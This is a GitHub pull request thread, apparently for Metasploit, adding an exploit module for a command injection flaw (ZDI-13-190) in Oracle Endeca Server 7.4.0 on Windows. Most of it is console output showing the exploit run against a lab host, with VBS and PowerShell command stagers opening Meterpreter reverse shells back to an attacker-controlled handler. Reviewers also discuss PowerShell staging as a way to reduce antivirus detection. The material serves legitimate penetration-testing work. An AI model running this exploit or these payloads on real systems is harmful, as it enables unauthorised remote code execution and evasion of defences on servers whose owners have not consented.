Add module for ZDI-13-190 #2269

Merged
merged 3 commits into from Aug 23, 2013

Conversation

jvazquez-r7 (Contributor)

Tested successfully with Oracle Endeca Server 7.4.0.787 / Microsoft Windows 2008 R2. Oracle Endeca Server can be downloaded from: http://www.oracle.com/technetwork/middleware/endecaserver/downloads/endeca-server-downloads-1721978.html

The vulnerable method only exists on the 7.4.0 branch and isn't available on the 7.5.5.1 branch. On the other hand, the injection has been found to be Windows-specific. This module has been tested successfully on Endeca Server 7.4.0.787 on Windows 2008 R2 (64-bit).

Test:

msf exploit(oracle_endeca_exec) > check

[*] 192.168.172.201:7770 - Version found: Oracle Endeca Server 7.4.0.787
[+] The target is vulnerable.
msf exploit(oracle_endeca_exec) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.201:7770 - Exploiting by deploying a VBS CMD Stager...
[*] Command Stager progress -   7.42% done (7499/101079 bytes)
[*] Command Stager progress -  14.84% done (14998/101079 bytes)
[*] Command Stager progress -  22.26% done (22497/101079 bytes)
[*] Command Stager progress -  29.68% done (29996/101079 bytes)
[*] Command Stager progress -  37.09% done (37495/101079 bytes)
[*] Command Stager progress -  44.51% done (44994/101079 bytes)
[*] Command Stager progress -  51.93% done (52493/101079 bytes)
[*] Command Stager progress -  59.35% done (59992/101079 bytes)
[*] Command Stager progress -  66.77% done (67491/101079 bytes)
[*] Command Stager progress -  74.19% done (74990/101079 bytes)
[*] Command Stager progress -  81.61% done (82489/101079 bytes)
[*] Command Stager progress -  89.03% done (89988/101079 bytes)
[*] Command Stager progress -  96.45% done (97487/101079 bytes)
[*] Sending stage (751104 bytes) to 192.168.172.201
[*] Command Stager progress - 100.25% done (101335/101079 bytes)
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.201:49346) at 2013-08-21 12:59:01 -0500

meterpreter > getuid
Server username: WIN-KBF2BO065KF\juan
meterpreter > sysinfo
Computer        : WIN-KBF2BO065KF
OS              : Windows 2008 R2 (Build 7600).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit -y
[*] Shutting down Meterpreter...

[*] 192.168.172.201 - Meterpreter session 1 closed.  Reason: User exit


def send_request_soap(data)
  res = send_request_cgi({
    'uri' => target_uri.path,
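Review bot: `target_uri.path` is passed to send_request_cgi unmodified, so a TARGETURI the user typed with a trailing slash (or without a leading one) produces a double slash or a malformed request path; wrap it as `'uri' => normalize_uri(target_uri.path)` so the path is canonical however the option was entered.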

Please normalize this to avoid possible double slashes made by the user.

@Meatballs1 (Contributor)

Even better with a PowerShell cmdstager: 1 cmd exec rather than all the multiple execs > file ;)

@jvazquez-r7 (Contributor, Author)

@Meatballs1, do you mean executing the PowerShell encoded payload from a web location, like in ms13_005_hwnd_broadcast?

If that's the case, I don't much like that option for a server-side exploit.

@Meatballs1 (Contributor)

No, like psexec_psh.

@jvazquez-r7 (Contributor, Author)

@Meatballs1 liked :-)

Bad thing (just pointing it out): there isn't really a CMD stager around the psh feature, so there's no command-line split feature; you need to put the full command in just one injection. It shouldn't be an issue in this case, since cmd on W2008 allows really long commands (8191 chars). Doing some calculations to make sure payloads fit, then updating.

Since the supported operating system for Endeca is W2008 I like this way of proceeding. If someone disagrees just let me know!

@jvazquez-r7 (Contributor, Author)

Switched to powershell:

  • Good thing: both 32- and 64-bit payloads are compatible now.
  • Bad thing: it's difficult to calculate the maximum payload length before all the psh encapsulation, so I'm adding a check after encoding the command and failing if the payload doesn't fit into the command. Shouldn't be a problem, since most of the Windows payloads are staged.
  • Test with 64-bit payloads:
msf exploit(oracle_endeca_exec) > set RHOST 192.168.172.201
RHOST => 192.168.172.201
msf exploit(oracle_endeca_exec) > set payload windows/x64/meterpreter/reverse_tcp 
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(oracle_endeca_exec) > rexploit
[*] Reloading module...

[-] Exploit failed: The following options failed to validate: LHOST.
msf exploit(oracle_endeca_exec) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(oracle_endeca_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.201:7770 - Exploiting through Powershell...
[*] Sending stage (951296 bytes) to 192.168.172.201
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.201:49171) at 2013-08-23 14:38:21 -0500

meterpreter > sysinfo
Computer        : WIN-KBF2BO065KF
OS              : Windows 2008 R2 (Build 7600).
Architecture    : x64
System Language : en_US
Meterpreter     : x64/win64
meterpreter > getuid
Server username: WIN-KBF2BO065KF\Administrator
meterpreter > exit
[*] Shutting down Meterpreter...

  • Test with 32-bit payloads; remember to use RUN_WOW64:
msf exploit(oracle_endeca_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(oracle_endeca_exec) > set RUN_WOW64 true
RUN_WOW64 => true
msf exploit(oracle_endeca_exec) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.201:7770 - Exploiting through Powershell...
[*] Sending stage (751104 bytes) to 192.168.172.201
[*] Meterpreter session 2 opened (192.168.172.1:4444 -> 192.168.172.201:49172) at 2013-08-23 14:38:43 -0500

meterpreter > sysinfo
Computer        : WIN-KBF2BO065KF
OS              : Windows 2008 R2 (Build 7600).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32
meterpreter > getuid
Server username: WIN-KBF2BO065KF\Administrator
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.201 - Meterpreter session 2 closed.  Reason: User exit
msf exploit(oracle_endeca_exec) > exit -y

@wchen-r7 wchen-r7 merged commit ad214da into rapid7:master Aug 23, 2013
@Meatballs1 (Contributor)

Yeah, for most cmd exec on Windows, PowerShell can do a one-liner.

If you needed more, it would be possible to do a psh cmd stager to drop a ps1 (or into env vars) that can auto-detect the architecture too (would have to drop both payloads). Avoids writing a stock exe, so it's much less likely to be picked up by AV.

@jvazquez-r7 jvazquez-r7 deleted the zdi_13_190 branch November 18, 2014 15:59
3 participants